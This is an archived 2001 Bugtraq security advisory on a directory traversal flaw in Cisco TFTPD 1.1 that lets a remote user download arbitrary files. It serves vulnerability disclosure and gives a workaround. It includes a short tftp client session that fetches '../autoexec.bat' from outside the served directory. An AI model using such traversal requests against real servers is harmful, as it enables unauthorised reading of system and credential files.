Bugtraq mailing list archives
Cisco TFTPD 1.1 Vulerablity
From: "Siberian" <siberian () splashpages de>
Date: Mon, 18 Jun 2001 15:29:14 +0200
[Sentry Research Labs - ID0201061701] (c) 2001 by www.sentry-labs.com Note: This advisory is for information and educational purpouse only! We are not responsible for any abuse or damage resulting from these information. Author: Siberian Topic: Security Bug in CISCO TFTPD server 1.1 Vendor Status: Informed (06/17/01) Vendor URL: http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp Preamble: This software is some days old and I do not know if it is still supported, but it is a serious issue which should be reported. The bug itself is very common. Issue: TFTPD is vulnerable to some kind of primitve directory transversal attack which allows a remote user to obtain any file from the target system. Exploit (using tftp client (Linux)): tftp> connect target tftp> get ../autoexec.bat Recieved 218 bytes in 0.4 seconds tftpd> quit Workaround: Install your base directory at another partition or Hardrive (not c:)
Current thread:
- Cisco TFTPD 1.1 Vulerablity Siberian (Jun 18)
- Re: Cisco TFTPD 1.1 Vulerablity Jim Duncan (Jun 18)